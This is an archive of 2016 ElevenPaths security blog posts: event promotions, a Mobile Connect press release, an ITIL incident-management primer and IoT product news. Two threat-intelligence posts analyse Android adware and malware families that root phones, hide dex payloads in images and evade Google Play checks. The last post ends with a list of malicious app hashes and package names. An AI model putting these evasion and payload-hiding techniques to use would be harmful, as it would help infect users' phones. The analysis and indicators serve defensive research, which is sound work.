Chief Security Ambassador at ElevenPaths leonardo.huertas@11paths.com @SamuraiBlanco
3 de marzo de 2016
Quiero ir a la RootedCON 2016 con ElevenPaths
Nos encontramos en plena semana RootedCON. Desde el pasado 29 de Febrero, la séptima edición de uno de los congresos más importantes a nivel Europeo se está llevando a cabo. Este año la RootedCON celebra los días 29 de Febrero, 1 y 2 de Marzo los trainings de formación. Nuestro compañero Pablo González impartió su ya clásico Lab de Metasploit. Las charlas o ponencias se llevarán a cabo los días 3, 4 y 5 de Marzo, en horario de 10.00 a 20.00 horas. En esta nueva edición ElevenPaths tendrá una buena representación y presencia en el evento contando con dos ponencias. Toma nota: Chema Alonso y Pablo González impartirán la ponencia "Sólo hay que besar un SAPPO para encontrar al príncipe" donde hablarán de Spear Phishing y APTs. A pesar de que cada día escuchamos nuevos términos para detectar los APTs en las organizaciones, la realidad es que la mayoría de las veces los ataques se basan en simples esquemas de Spear Phishing que abusan de sistemas que no tienen una gestión robusta de las identidades. Pero esto puede ser mucho peor si los sistemas están en la cloud y tienen tantas funcionalidades como para que no sea necesario nada más que conseguir un par de clics, incluso aunque haya un segundo factor de autenticación en todas las identidades. En esta charla verás cómo funcionan los ataques SAPPO en entornos corporativos para que tu sistema de varios millones de dólares sea roto por un simple correo electrónico que se recibió hace varios meses. También estarán nuestros compañeros Rafael Sánchez y Francisco J. Gómez impartiendo la ponencia "Esta noche, en Cuarto Milenio: Escanenado Internet en IPv6" donde se presentará oficialmente el primer servicio de búsqueda de información sobre servicios expuestos a Internet en IPv6. Este servicio permite realizar búsquedas sobre contenido de banners, direcciones y rangos IPv6, puertos, geolocalización, etc. Cuando una vulnerabilidad de alto impacto que afecta a un determinado software es publicada, una de las cosas que hacemos los analistas de seguridad es buscar en Shodan equipos afectados. ¿Por qué no ampliar esta búsqueda a servicios vulnerables expuestos en IPv6? SORTEAMOS 2 ENTRADAS ¡Sorteamos dos entradas para la RootedCon! Sí, has leído bien. Si quieres pasar una semana escuchando a grandes ponentes y aprendiendo en estos interesantes talleres y charlas, no dudes en apuntarte a la nueva edición de RootedCON. ¿Qué hay que hacer para participar y ganar?: 1. Sigue a ElevenPaths en Twitter 2. Retuitea este tuit » Quiero ir a la #RootedCON con @ElevenPaths 3. Dar me gusta en la página de Facebook ElevenPaths El ganador se elegirá el día 2 de Marzo 2016 de manera aleatoria. ¡Mucha suerte y nos vemos en la RootedCon!
2 de marzo de 2016
GSMA’S Mobile Connect available to 2 billion consumers globally
Mobile Connect Launched with 34 Operators in 21 Countries Around the World Barcelona: The GSMA today announced that the GSMA Mobile Connect mobile-based authentication solution is now available to 2 billion consumers globally. Since the solution was introduced at Mobile World Congress 2014, 34 mobile network operators (MNOs) have launched the service in 21 countries, with plans for additional launches and trials to follow in 2016 and beyond. Operators offering services based on Mobile Connect include América Móvil, Axiata Group (Bangladesh, Indonesia, Sri Lanka), China Mobile, China Mobile Pakistan (Zong), China Telecom, China Unicom, DNA, Elisa, Globe Telecom, Indosat Ooredoo, Mobilink, Mobitel, Orange (Egypt, France, Morocco, Spain), Sunrise, Swisscom (Switzerland), Telefónica Group (Argentina, Mexico, Peru, Spain), Telenor Group (Bangladesh, Malaysia, Myanmar, Pakistan, Thailand), TeliaSonera (Finland), Telkomsel, Telstra, TIM and Turkcell (Turkey). “Over the past two years, the industry has come together to simplify consumers’ lives by offering a single, trusted, mobile phone-based authentication solution that respects online privacy and helps to mitigate the vulnerability of online passwords,” said Mats Granryd, Director General, GSMA. “As Mobile Connect is rolled out globally, mobile operators are fulfilling an important role in the digital identity space, giving users control over their own data and enabling consumers, businesses and governments alike to interact and access online services in a convenient, private, and trusted environment.” The GSMA’s Mobile Connect solution enables customers to create and manage a digital universal identity via a single log-in solution. The service securely authenticates users, enabling them to digitally confirm their identity and their credentials and grant safe online access to mobile and digital services such as e-commerce, banking, health and digital entertainment, and e-government, via their mobile phones. It works by employing the user’s unique mobile number, combined with a unique PIN for more secure use cases, to verify and grant online access anywhere they see the Mobile Connect logo. All operators and online service providers using Mobile Connect have signed up to the GSMA Mobile Connect privacy principles, which is a core pillar of Mobile Connect. Additional Deployments and Evolution of Mobile Connect The GSMA is working closely with operators globally to further extend the adoption of Mobile Connect; operators committed to deliver the service this year include Aircel, AIS Thailand, Bharti Airtel (India), Etisalat (Pakistan, United Arab Emirates), Idea Cellular Ltd, MTN, Ooredoo (Algeria, Myanmar), Orange (Jordan, Poland), SMART Axiata – Cambodia, Smart Communications, Inc., Tata Teleservices, Telefónica Group (Brazil, Colombia, Ecuador, Uruguay), Telenor (India), T-Mobile Poland and Vodafone (India, Spain). Mobile Connect has also been trialled in two EU Member States, Finland and Spain, to establish proof-of-concept for cross-border authentication of e-government services and online interactions between businesses, citizens and public authorities. While initially focused on secure and convenient log-in to digital services, Mobile Connect is evolving to deliver secure authorisation of digital transactions and to add context and attributes about the user and the transaction to increase convenience, trust and security for users and online service providers, while respecting users’ privacy. This is currently being trialled in the UK by O2 and Vodafone. Expanding Mobile Connect Services Mobile Connect is now in commercial use by a wide range of digital service providers in the launch markets including BDTickets, Bloodlink, Cipika Play, CriticaLink, Dhaka Pixel Ltd., GoGhoom, Homeshopping.pk, LangitMusik, migme, Mudah, Rozee.pk, TakeMeTour.com (Thailand), Wavoo, WOW and Wunn Zin Bookstore. These companies comprise a range of vertical services such as commerce, finance and banking, government service access, health services, and media and entertainment. Technology suppliers such as Apigee, Ericsson, Gemalto, Giesecke & Devrient, GMO GlobalSign Oy, MePIN/Meontrust, Morpho (Safran), Movenda, Nok Nok Labs Inc., Orange Business Services, Ping Identity and WSO2.Telco deliver the technology necessary to support Mobile Connect and to enable easy integration with the operators' mobile networks so that users of any mobile network offering Mobile Connect can log in and authorised for any application. » Download press release *You may also be interested on: Introducing Mobile Connect – the new standard in digital authentication Mobile Connect: el nuevo estándar en autenticación digital Mobile Connect makes headway with launch of cross-border pilot How Telefónica collaborates with the GSMA to define a project use case scenarios using lean startup”? For further information: mobileconnect.elevenpaths.com
24 de febrero de 2016
Gestión de Incidentes (I)
De acuerdo con ITIL (Information Technology Infrastructure Library por sus siglas en inglés), "...la Gestión de Incidentes tiene como objetivo resolver cualquier incidente que cause una interrupción en el servicio de la manera más rápida y eficaz posible. No debe confundirse con l a Gestión de Problemas, pues a diferencia de esta última, no se preocupa de encontrar y analizar las causas subyacentes a un determinado incidente sino exclusivamente a restaurar el servicio. Sin embargo, es obvio, que existe una fuerte interrelación entre ambas..." De igual forma, la misma ITIL hace especial referencia en que “...también es importante diferenciar la Gestión de Incidencias de la Gestión de Peticiones, que se ocupa de las diversas solicitudes que los usuarios plantean para mejorar el servicio, no cuando éste falla...” asuntos estos que se pueden prestar a confusiones. Son varios los propósitos de la gestión de incidentes en general, pero para considerar se deberían tener en cuenta que busca: Descubrir variaciones en los servicios TI. Registrar y clasificar estas variaciones. En caso de presentarse fallas en algún servicio; asigna recursos de personal para restaurar el servicio según se define en el SLA (service-level agreement) correspondiente. En lo anteriormente descrito y de manera obligatoria interactuando estrechamente con el usuario, entra a jugar un rol importante un nuevo actor: el Help Desk. De igual forma, este recurso tecnológico y humano, que se encarga de prestar servicios con la posibilidad de gestionar y solucionar integralmente las posibles incidencias trabajando en coordinación con la atención de requerimientos relacionados a las Tecnologías de la Información y la Comunicación (TIC). En cuanto al aspecto de clasificación, es importante considerar que esta se da (debe darse) en el momento que se reportan los incidentes, puesto que es el momento justo para recopilar toda la información que pueda ser utilizada para su resolución. Si se tomara una clasificación de incidentes de hardware y software; estos podrían ser algunos ejemplos: Hardware: Alerta por fallo en fuente de alimentación o fallo de memoria Software: Interrupción del servicio de correo electrónico por actualización o fallo de la aplicación Los siguientes diagramas resumen el proceso de gestión de incidentes: Proceso de gestión de incidentes. Fuente ITIL Proceso de gestión de incidentes. Fuente ITIL En la siguiente entrega se describirá más en detalle cada una de las partes de este proceso. Gestión de incidentes (II) Leonardo Huertas CSA – Chief Security Ambassador at ElevenPaths leonardo.huertas@11paths.com @SamuraiBlanco
23 de febrero de 2016
![[NEXT STOP] ElevenPaths en la RSA Conference de San Francisco](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6392_blog-RSA.png)
[NEXT STOP] ElevenPaths en la RSA Conference de San Francisco
La RSA Conference es uno es uno de los eventos anuales más importantes del panorama de la seguridad mundial. La conferencia celebrada en Estados Unidos sigue siendo la cita obligada para los responsables de seguridad de todo el mundo y por supuesto, desde ElevenPaths no podíamos faltar. Del 29 de febrero al 4 de marzo estaremos en el Stand de Telefónica situado en el Hall Norte Stand #4902. Allí, de la mano de nuestros expertos, os presentaremos y enseñaremos a través de varias demos de nuestras tecnologías, la nueva capacidad de análisis de pentesting persitente de Faast para IoT, que esta semana estamos contando en el Mobile World Congress de Barcelona. De esta manera, Vamps y Faast, los guardaespaldas del Internet de las Cosas aterrizarán en la RSA Conference de San Francisco junto con el resto de soluciones de Telefónica y ElevenPaths para el ámbito del IoT, como son Security Monitoring, que detecta comportamientos anómalos de los dispositivos IoT basándose en su tráfico de red, CyberThreats con capacidad para detectar e identificar el modus operandi de los cibercriminales, y las técnicas usadas en ataques contra las infraestructuras IoT. Ven a visitarnos y descubre: Cómo asegurar los recursos de IT e IoT expuestos con nuestras soluciones de Seguridad para IoT Cómo averiguar lo que está pasando con todos sus activos en los dispositivos IoT de tu entorno corporativo gracias a Vamps y Faast para IoT Cómo funciona el nuevo estándar de autenticación digital con Mobile Connect Cómo utilizar un pestillo no sólo en tu puerta, sino en tu vida digital gracias a Latch Cómo controlar y analizar tus amenazas móviles con Tacyt Cómo asegurar tus documentos sin deshacerte de tu firma con SealSign ¡Toma nota! Del 29 de Febrero al 04 de Marzo estaremos en la RSA Conference 2016 de San Francisco, en el Stand de Telefónica [Hall Norte Stand 4902], exponiendo nuestras últimas novedades en Seguridad para IoT. » [SABER MÁS] Conoce nuestras soluciones de seguridad para IoT *También te puede interesar: Telefónica y ElevenPaths presentamos en el MWC16 nuestra oferta de ciberseguridad para IoT Telefónica and ElevenPaths extends its cybersecurity offering to the IoT environment [NUEVO] Así funcionan nuestras soluciones de ciberseguridad para dispositivos IoT en tu empresa Whitepaper "Alcance, escala y riesgo sin precedentes: Asegurar el Internet de las cosas" elaborado conjuntamente por Telefónica y el equipo de analistas de ElevenPaths Whitepaper "Scope, scale and risk like never before: Securing the Internet of Things" by Telefónica and ElevenPaths Analyst Team Whitepaper “New Paradigms of Digital Identity: Authentication and Authorization as a Service (AuthaaS)” elaborado conjuntamente por Gartner y Telefónica Para más información elevenpaths.com
22 de febrero de 2016
El "circuito comercial" del adware/malware de Android
¿Cómo funcionan las mafias chinas a tiempo completo, creando malware para Android? ¿Controla una gran banda china, buena parte del adware más peligroso? Dr. Web descubrió hace poco malware/adware en Google Play que utiliza esteganografía para ocultar código en imágenes descargadas. En Eleven Paths lo hemos relacionarlo de nuevo con las últimas muestras de malware detectado en Google Play desde hace más de un año. Así que nos surge la pregunta: ¿cómo funcionan estas bandas? ¿cuál es el ciclo de vida de sus apps? ¿están asociadas de alguna forma? Desde hace algún tiempo, diferentes casas antivirus, con apenas algunas semanas de diferencia, comenzaron a sacar a la luz malware aparentemente distinto y muy peligroso que se alojaba en Google Play puntualmente o en markets alternativos en masa. Fortinet descubre en el verano de 2014 que en Google Play se aloja una familia de adware extremadamente agresivo que intenta rootear el teléfono, al que llamaron Odpa. Cheetah Mobile habla de "Ghost Push" el 18 de septiembre de 2015. Malware difícil de desinstalar con 600.000 descargas. El 21 de septiembre, CheckPoint destapaba BrainTest, un malware bastante sofisticado encontrado en Google Play capaz de rootear el teléfono con diferentes técnicas e instalar así malware alojado en otras partes. Este malware volvió a aparecer, algo evolucionado a finales de 2015 y de nuevo en Google Play. El 22 de septiembre, FireEye descubre la campaña de NGE Mobi/Xinyinhe que rootea el teléfono y realizaba descargas encubiertas de otras apps. Esta "empresa" se dedica precisamente a la promoción de apps (Black ASO), elevando artificialmente el número des descargas de aplicaciones. El 30 de septiembre, Trend Micro habla de nuevas variantes de Ghost Push con mejores funcionalidades y añadiendo el cifrado de APKs. El 7 de octubre FireEye descubre "kemoge", una familia que rootea también el teléfono e instala cualquier aplicación en él. Además, resulta extremadamente difícil de eliminar del dispositivo. A finales de enero de 2016, Dr.Web detecta una nueva familia de Xynyn que utiliza esteganografía para descargar un apk en el teléfono, pero no intenta rootear. Durante los últimos meses, se observaba lo que parecía una avalancha de malware para Android que muchas de las veces lograba colarse en Google Play, de origen chino y que siempre parecía estar muy relacionado con el adware más agresivo, buscando el rooteo para fines comerciales. En ElevenPaths realizamos hace unos meses un estudio con Tacyt. Pudimos observar que todas estas familias (a las que, para más confusión, Lookout puso nombres como Shuane, Shedun, Shiftybug…) podrían pertenecer al mismo grupo de desarrolladores. La compartición de infraestructuras, similitudes en el código, uso de ciertas peculiaridades en su ensamblaje… nos remontaron a una misma mafia o grupo que operaría exitosamente desde al menos las primeras versiones de Opda en 2014, y que han ido evolucionando en sus técnicas hasta crear Kemoge o las últimas versiones de Brain Test que, aunque con nombre "comercial" diferente para las casas antivirus, vienen a ser muestras muy similares. Este último descubrimiento de Dr.Web, nos confirma lo que ya sospechamos: o pertenecen a la misma banda o bien existe una fuerte asociación mercantil entre ellas, y comparten "i+d" e infraestructura. Pero también sabemos que entre cada noticia y noticia sobre nuevo malware que sale a la luz, la actividad de estos grupos no se detiene. Observamos con Tacyt decenas de apps en Google Play que si bien no contienen toda la carga del malware que aparece en las notas de prensa, sí que pertenecen a los mismos desarrolladores. Por poner un ejemplo, los autores de Shuabang, malware descubierto por Eleven Paths a finales de 2014, siguen publicando habitualmente hoy por hoy, adware menos agresivo en Google Play. Su pequeña "firma", que consiste en certificados cada uno diferentes, pero con una configuración muy especial en las que usan tres palabras en inglés aleatorias unidas en un campo, nos permite comprobar que su labor no cesa. Igual ocurre con los creadores de todo el malware nombrado más arriba. Siguen a diario publicando adware "poco agresivo" en Google Play, y sabemos que son ellos, y que están detrás de aplicaciones que no tienen por qué ser malware desde la primera versión, pero sí muy probablemente adware más o menos agresivo que más tarde va "madurando". Una prueba, es que tras varias semanas o meses online, casi todas las apps de estos autores terminan siendo retiradas. La estrategia con Tacyt es identificar al desarrollador, no solo o necesariamente la muestra, y ampliar la protección. Así, en estas mafias la actividad de "perfil bajo" no se detiene y en cuanto pueden pasan al malware más agresivo. Saben que tarde o temprano serán cazados, retirados del market y detectados, pero durante ese corto espacio de tiempo, el beneficio se dispara. La actividad "de fondo", aunque con menor impacto, es más duradera en el tiempo y sus apps o bien no son retiradas nunca o bien pasan meses hasta que se reconocen como adware. Modus operandi: El circuito comercial del malware chino. Estas mafias o grupos tienen un objetivo y varios problemas a los que enfrentarse. El objetivo no es diferente a los del malware tradicional de escritorio: instalar su software en el mayor número de usuarios posible, para poder monetizar sus infecciones al máximo. El problema es que para realmente funcionar a gran escala, deben intentar sortear las barreras de Google Play y situarse así en el mejor de los escaparates. Dar con el código adecuado que eluda sus controles es complejo y lleva tiempo. Mientras lo consiguen o no, el adware "tolerado" o de "fácil absorción" en Google Play no deja de fluir. Saben que es de menor impacto, pero supone un beneficio continuo. A la izquierda, tras pasar hace años por Google Play, hoy todavía es descargable la " linterna molona" con estafa SMS en Mobogenie. A la derecha, también Brain Test todavía activo hoy en otro market alternativo. De esta forma, el laboratorio de estas mafias, trabaja principalmente para introducir en Google Play el malware más sofisticado y que por supuesto pase desapercibido. Ese es el objetivo número uno, y muy pocas apps lo consiguen. Un caso de éxito absoluto, sería el alojar en Google Play apps que rooteen el teléfono por sí mismas con varios exploits, y una vez en este estado, descargar e instalar otro malware aún más potente que es muy complicado de eliminar del dispositivo. Y así lo han hecho a veces. Esto reporta muchas víctimas durante un corto periodo de tiempo, puesto que serán cazados y expulsados del market. Si Google o los antivirus neutralizan la técnicas, estas apps pasan a ser distribuidas en otros markets o circuitos con políticas más relajadas, donde seguirán infectando en una larga cola (menos usuarios, pero durante mucho más tiempo). Un posible esquema de ciclo de vida de las apps Durante los periodos de investigación, la actividad no cesa. Transversalmente, el adware más "común" no para de desarrollarse y ser introducido en Google Play, donde igualmente alimentan esa larga cola de beneficios. Estas apps van actualizándose con funcionalidades cada vez más agresivas, hasta que son eliminadas del market y pasan de nuevo a otros circuitos. Así, mantienen gracias a estas apps a su vez a otras compañías que se anuncian como gestoras de posicionamiento, ofreciendo descargas instantáneas, votos o comentarios positivos "al peso". Conclusiones Quizás esto sugiere que el malware profesional chino está muy pocas manos, y centrado en el adware agresivo y rooteo de sistemas para robar información. En términos muy parecidos podríamos hablar de la "otra industria", el malware bancario para Android que se genera fundamentalmente en los países del este, como ha pasado tradicionalmente con el malware de escritorio. De este ejemplo tenemos por ejemplo el último Mazar BOT, con respecto al que, por cierto, hemos podido inferir que es muy posible que la gente de Slembunk esté detrás. En resumen, una fórmula "piramidal" que les permite trabajar todo el tiempo, a diferentes escalas y niveles, con picos de mayor éxito. Sergio de los Santos ssantos@11paths.com @ssantosv
19 de febrero de 2016
![[ESTÁ PASANDO] #Hackathon Sinfonier ¡ON AIR!](https://media.telefonicatech.com/telefonicatech/uploads/2021/1/6397_hackathon.jpg)
[ESTÁ PASANDO] #Hackathon Sinfonier ¡ON AIR!
Hoy y mañana estaremos de reto. Arrancamos el Hackathon de Sinfonier en la ETSIIT de Granada, un punto de encuentro entre Universidad y Empresa para identificar el talento a través del desarrollo de aplicaciones de BigData orientadas a las Smart Cities, Economía Digital e Identidades Digitales. Se respira un aire distinto y muchas ganas de llevar a cabo alguna de esas locas ideas que a todos se nos han pasado alguna vez por la cabeza. Os lo estamos contando en directo desde nuestro Twitter @ElevenPaths. Síguenos y entérate de todo. ¡Dentro reto! Reto: Volatilidad, Persistencia y Representación El objetivo de este reto es poder realizar búsquedas dentro de redes sociales y de gestores de archivos, para así poder modelar una base de datos con los resultados obtenidos, permtiendo estudiar la evolución de los diferentes elementos recuperados. Además también se propone representar los datos obtenidos dentro de una base de datos de grafos para poner ver las relaciones entre ellos. Las redes sociales sobre las que se va a trabajar son: Facebook, Linkedin y Archive.org. Para trabajar con ellas se han considerado una serie de aproximaciones: Facebook Facebook API Simulación de login Sin Login ni API Linkedin Peticiones web (sin login) Archive.org API Peticiones web Las puntuaciones detalladas se pueden consultar aquí. En principio sólo se aceptan a concurso las soluciones que estén contempladas dentro de las puntuaciones, en caso de que algún participante tenga ideas de otros módulos lo ha de consultar previamente con la organización para que pueda determinar si ese módulo se podría aceptar. También recordar que el desarrollo de módulos se ha de realizar utilizando la máquina virtual que se ha proporcionado y una vez los módulos sean funcionales se han de subir a la comunidad de Sinfonier para que puedan ser evaluados. Para facilitar la entrega de resultados se ha elaborado una plantilla del Excel que se debe entregar cumplimentado. ¡Suerte a todos!
17 de febrero de 2016
Telefónica and ElevenPaths extends its cybersecurity offering to the IoT environment
Telefónica and ElevenPaths present at MWC the first technology for detecting and analysing threats Telefónica and ElevenPaths will present at Mobile World Congress, that begins on 22nd February in Barcelona , the first technology available on the market designed to counteract cyberattacks on the Internet of Things (IoT). Known as Faast, a renowned technology developed by the company, it specialises in detecting and analysing security threats to organisations based on persistent pentesting which now includes the detection of vulnerabilities in IoT. Faast is not only the first technology solution of this type, but also provides companies and organisations with an integral cybersecurity solution that protects them from threats to traditional devices connected to their systems and also others pertaining to IoT such as web cams, printers, routers, video- conference systems or televisions also connected to the corporate network. With the new features incorporated by Faast, companies can continually scan IoT devices connected to the organisation, thanks to the use of real attack techniques, making their networks more robust and in this way counteract future attacks. Once the devices have been identified, the technology detects the current vulnerabilities. Failures include insufficiencies in authentication or authorisation processes, insecure network services or lack of encryption when transmitting information. The user can manage these and other vulnerabilities pertaining to all IoT devices through Vamps, an online site. “Traditional periodic security checks don’t make sense anymore because the changes in the infrastructure, the emergence of new vulnerabilities and different bugs are continuing”, says Chema Alonso, CEO of ElevenPaths. “The evolution of Vamps & Faast towards IoT will allow companies to rely on a persistent pentesting and vulnerability management system that will facilitate the quick discovery of new connected devices and possible bugs, thereby reducing the exposure time of these devices to these threats”. The sheer size of the IoT phenomenon in a hyper-connected society is exposing companies to dangers unknown up to now, hence the importance of early detection of security attacks that threaten IoT devices. This is one of the conclusions of the report "Scope, scale and risk like never before: Securing the Internet of Things” recently published by ElevenPaths and the area of IoT of Telefónica to which other organisations and companies working in this arena have contributed such as SIGFOX and the IOT Foundation. This new analysis capacity by Faast of IoT, completes the portfolio of different security solutions for IoT currently on offer by Telefónica, such as Trusted Public Key Infrastructure that facilitates the identification and authentication of IoT devices connected to the network; Security Monitoring, which detects unusual behaviour of IoT devices based on its network traffic; and CyberThreats, capable of detecting and identifying the modus vivandi of the cybercriminals, and the methods used in attacks against IoT infrastructures. *You may also be interested on: New Whitepaper "Scope, scale and risk like never before: Securing the Internet of Things" by Telefónica and ElevenPaths Analyst Team For further information: www.elevenpaths.com
15 de febrero de 2016
La familia de malware Xynyin, ahora con esteganografía, vuelve al ataque en Google Play (y se mantiene)
El laboratorio Dr.Web ha vuelto a descubrir malware alojado Google Play, unas sesenta según sus cálculos (algunas más según Tacyt), probablemente los herederos de una familia conocida. Aunque alertaron a Google a finales de enero, ya han retirado algunas de las apps, pero aún quedan muchas online. Son juegos aparentemente inocentes que, además del robo de información habitual, descargan otro apk oculto en una imagen, lo decodifican, e intentan ejecutarlo. Son juegos muy elaborados, completamente funcionales y bastante atractivos visualmente. Además, son introducidos por decenas en Google Play con diferentes cuentas y nombres de desarrolladores. Esto indica una perfecta planificación, especialidad y experiencia en el mundo de malware que se cuela en Google Play. De hecho, casi todas las casas antivirus los han posicionado dentro de la familia de Xynyin (o Xiny, o Xinyin, dependiendo del motor) de la que en ElevenPaths hemos hablado en más de una ocasión. De hecho hemos barajado la posibilidad (además de por los datos aportados por Dr.Web, por otras características similares) de que sea una de las variantes más primitivas de lo que luego derivó en malware más sofisticado, como Kemoge, Odpa, Brain Test.... Uno de los fabricantes detectados por Dr.Web Aunque Dr. Web no da muchos detalles del análisis realizado, esta rama de malware (por no realizar un "rooteo activo") se acerca más al adware extremadamente agresivo, y por tanto se emparenta como la rama más "primitiva" de la familia. En esta ocasión, con este malware bautizado Xiny.19, han introducido algo tan curioso como la esteganografía. Descargan una imagen y, usando un algoritmo que publica Dr.Web, extraen de él el archivo dex que más tarde será cargado en el teléfono con DexClassLoader. Aunque en esta ocasión no intentan rootear el sistema. Con esta salvedad, la fórmula entra dentro del modo de operar habitual de todas estas familias: un juego funcional roba información e intenta descargar un payload diferente e instalarlo de la manera más silenciosa posible. Si para ello debe rootear el dispositivo, lo intentará… o no, dependiendo del momento y la capacidad de pasar desapercibido bajo los controles de Google Play. Además, aunque no lo menciona Dr.Web, es interesante observar que codifica todos los binarios con Base64, además de otras técnicas de ofuscación. Uno de los juegos, con código y binarios ofuscados en base 64 Todos estos detalles nos han permitido observar que es fácil localizar apps del mismo fabricante (en este caso, de la misma banda) dadas algunas fórmulas fijas con las que suelen operar. Algunos de nuestros filtros en Tacyt siguen cazando apps con el mismo perfil. No todas actúan exactamente de la misma manera, pero todas son en mayor o menor medida maliciosas… o lo serán el futuro cuando actualicen. De ahí quizás que no hayan sido ya retiradas todavía. Sin embargo, muchas están ya siendo detectadas por firmas por los antivirus, y a la larga serán también eliminadas del market. Uno de los filtros, en acción De hecho, una de las analizadas por Dr.Web, se encontraba en Google Play desde noviembre de 2015, y solo cuando Dr.Web ha hecho público el anuncio a finales de enero, ha sido retirada. Como dato adicional, cuando la casa antivirus dio el anuncio y lo bautizó con la firma Xiny.19, otros motores ya lo detectaban directamente por firma, con nombres como por ejemplo Deng (el habitual "saco roto del adware" para AVG), Suaban (nombre derivado de la saga de firmas Shuabang, y actual saco roto del adware de ESET e Ikarus). Hemos detectado con Tacyt, configurando un patrón de actuación del atacante, más de 200 apps con comportamiento similar y que provienen muy probablemente de la misma banda. Apenas 50 han sido retiradas. Ofrecemos aquí una lista con diferentes versiones de las que siguen online. No garantizamos que todas y cada una contengan exactamente la misma funcionalidad que la descrita por Dr.Web, pero sí una altísima probabilidad de que sean del mismo programador o sistema de programación, o sea, que pertenezcan al mismo grupo de desarrollo. Esto, cuando menos, garantiza su poca fiabilidad. En cualquier caso, todas corresponden a adware muy agresivo. d0a051bbc1d64c8d60c2ea7907ad41f9539a7734,com.ninja.u32d 2ce45fff100e10248a39d23b949b3cda80f20f72,com.tgame.sniperheroEnglish 4f114b06b56b0a8674fa49de72513cb301e26b67,com.jinzhailu.driveAngry2_u3d 70a6f30cb7b74fabe0ed06b64c9ab4c1e14e1278,com.BIO.CarParkingFree 654e3759c7abebaf32d61b60f9738b1b3fd658cd,com.joymeng.u3d 4d1f9950df262bebecc290b558ad2f39d9dd7354,com.mine.BvZlt a040ef6185433ef3030339a131c2d57fd1ba78e8,air.ro.jocuricumasini.gizmotractorrace 1134599976e53b86f715c0d587c3a419673344e9,com.zombieshoot.firstblood3d.sniper2099 e2967ccdae8374d2f9e9687073e30aec5fc23cfa,com.real.zmobie.fire 43b76b11855d81dd9ca601647fdf76153995e556,com.intelligame.Angry.Zombie.CityShoot1 be4633d55b67584f4929e72dacc0e2e395c59be0,com.megagame.JewelCrushPro 795dbc254f4c03741e7991e50c428ffbcfc2d756,com.mine.zombiepkbird e944a44b209c3c3c71e0595b2506b5568e96f368,com.optimuslab.slowball bca7d824cc262275dd428374d02a7235e3f0fd46,com.smartgf.deluxe.bubble.shooting.bust2016 945bb27fcad8e30f2d1c0a349dbe583ad504b1c4,com.Gp_ZombieRoadHighway_a1 31ce41ea707b1a295e90ba3ffa9ea23ab0faa69d,com.royal.feather.fall.down.pro.game ae10d3c28cdc2d58106a386a3a32ac462a4781ab,com.xcq.clansrunner 8668ee4f5a064f49125efc259771f1b3d1f00dd7,com.gamevillage.elitesniper 0ffda08d9c91136b73834b9b00ad4daf60489708,com.BringItOnGames.ExtremeFuriousDrivingSimulator d751f08decb2c58745126c52663aa61068473a58,com.gamevillage.skateboys baaabc12b76b32585a777370ab849395bf698c77,com.gamevillage.sniperassassinfree cdfa06e7fc44b02bd32ca01a7c2a9ad6bd526f2f,com.gamevillage.atvrally 2d1d88ce464829fe4673f0124b6db9676e4c4e9e,com.transportgames.transagent b81d122f091ac16de84519d4db7e4bbebe57f96a,com.gamevillage.basketballshooting a94b9dbb7936998c8fbf412e339ff021c6f480fb,com.GameValleyStudios.MonsterTruckRacingUltimate 2970049e9eb659dbaf1baaf56d4ec94001a87794,com.GameValleyStudios.RivalsRacingFever dae60241720edebf37c5d11fca7a1d8c90f0dd5a,com.GameValleyStudios.RivalsRacingFever 2d4dee87676bc50fc62b0c1adc7572bf5cf9d089,com.gamevillage.busdrivesim b8f23f412b96d5cde905aa753de6ae4971b46288,com.GameValleyStudios.MonsterTruckRacingUltimate 30e9fc940c4491b6957a120e4feab3b2c404c585,com.BIO.TankGame f17fdf23cad2a5d09388e833204205561f3e6bd7,com.star.crush.pop.casual.fungame 9a932315489fde7423627523b3f70ac70619104b,com.gamevillage.deathtruckracer 539020bcd444ee4a700332b10e32e086a05bfd5d,com.tankgames.tankfighter ff1ca56975cad68b575773847e214749d710a493,com.gamevillage.zombieshoot 6e172bb91bcf189a74370ee820e9fa8ddd98fe8f,com.zombie.highway.crush.racing f06ded2ccb909fd5501e5b2a97ca31cd080e2aa6,com.gg.trail.dirt.bike.racer.game e736f73ffb522711d6746d8100acf2d0eabe9f67,com.fgc.bubblewitchsmach 7a3c09c323c910476fc2f682af2ee630eff543b6,com.battleracing.fastmoto.vilence1999 9a92a3958730099d51b9adc7bf088ae45ade7b88,com.gamevillage.moderntruck e69e0e66e59bdaa0edf19e42f8c85d6fb86de77a,com.Death.Air.Battle.bluebattle c2a787a2841f24e2cfcbc1f86c4ea274e0956db5,com.motiongames.battletankglory 85f293ba1821274ec0e962a68a8dd1c3871f40a2,com.motiongames.sniperduty3d 5c764ce2d389f06c3c6166309c709d0e1014bb05,j.valetparkingspot ea9a3a7fefd42ea368ec90318db3774f6623553e,com.Angry.ZombieCity.Stormfighters40052 d5286f37088290047630b8bede7c43acd4640685,com.motiongames.hillracing 1c4ee55d777e0481780e388845fa1e9fd359b174,com.injoy.hero.runner.rush.hd f6bedc6e7a5bd2bf18b6ea4aafd5e7ba1dc8eee6,com.motiongames.sniperduty3d 2b973a1775038fd288066da6f7c05cfcfd45b86e,com.maxplay.mountaintrans 68fe39a381173592ea644756322b4eed2ee21bcb,com.goodgame.fankongshenqiangshou 58f4301199a818a793afdafbae84b5f0a3fe5d84,com.motiongames.snipershooting 078fe6d0e2014bdf59def11bc3aa246cf0e1da6e,com.Gp_SeaCrushLegend_a1 7b97c4e43dcc57089dc210cdf6c60e929ce5c40f,com.airfly.fightergame.en1949 0d6745ff3042d3e9965b212f035fa7a9d8b3b4d4,com.dream2015.sweetheroesland 95568980751fb9d3ded9f465a9fb7486b19d7eaf,com.play.ldzj2013hhben.carzy2 73b88d6f0f2bb7f016c5001e7f884893f3450113,com.dream2015.gardenheroesland b00d0a864ea16f7f78336f79ec97c52ab8c0cdbd,com.xcq.sanguo 6888ee9901001a0dec42b7dcdbb6cb8200629935,com.Crazy.Zombies.ruah.Zombiehqfy 38356630d36eee51ce657830f2dd9c844e21e3e0,com.Gp_BoomHero_a1 2e5650109226c6c85bf6d4de294a53c587b0ba9e,com.ttxzl.milu.fungame db5171d41bc52b60e876e0eef562e39b48a2a3d4,com.ts.fruityslot e4f1de47cf8aec4772e8ed929456dc3af0216cc4,com.megagame.CakeCrushMania a7c410fcb25891a168010d3437390a918fe3f3ec,game.blast.yyqk 35867fcd8ed6cd0b55fd57d1e7a1b47f109151cd,com.smartgf.dont.touch.angry.spikes fa6801452194a871a0c6cd2cf89edac43a01314f,com.freegamespree.nitro_traffic_racing 